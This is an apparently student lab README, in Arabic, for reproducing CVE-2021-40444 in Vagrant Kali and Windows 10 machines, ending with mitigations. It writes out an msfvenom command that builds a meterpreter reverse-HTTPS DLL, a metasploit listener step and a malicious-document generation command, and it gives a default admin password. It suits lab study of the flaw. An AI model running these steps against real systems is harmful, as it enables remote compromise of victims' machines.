TIC4301_Project
مشروع TIC4301 - CVE-2021-40444
حمّل صناديق Vagrant التالية:
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
استورد الصناديق باستخدام الأوامر التالية عبر vagrant:
- vagrant box add kali_package.box
- vagrant box add victim_package.box
- vagrant init kali_package.box
- vagrant init victim_package.box
- vagrant up
الإعداد (win10):
- في صندوق win10، سجّل الدخول كمسؤول بكلمة المرور vagrant.
- انقر بزر الفأرة الأيمن على script.ps1 على سطح المكتب وقم بتشغيله باستخدام powershell. (اتركه مفتوحًا)
- قم بتشغيل ipconfig.exe واحصل على عنوان هذا المضيف.
الإعداد (Kali):
- cd Desktop/CVE-2021-40444.
- قم بتوليد ملف dll الخبيث الخاص بك باستخدام msfvenom. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
- شغّل مستمعًا في metasploit.
- قم بتوليد المستند الخبيث. # python3 exploit.py generate test/calc.dll http://
- قم بزيارة http://<win 10 IP>/upload وارفع الملف.
- انتظر وصول الـ shell.
التخفيفات:
- قم بتثبيت الإصلاح العاجل KB5005565.
- قم بتعديل سجل Windows باستخدام patch.reg في المستودع.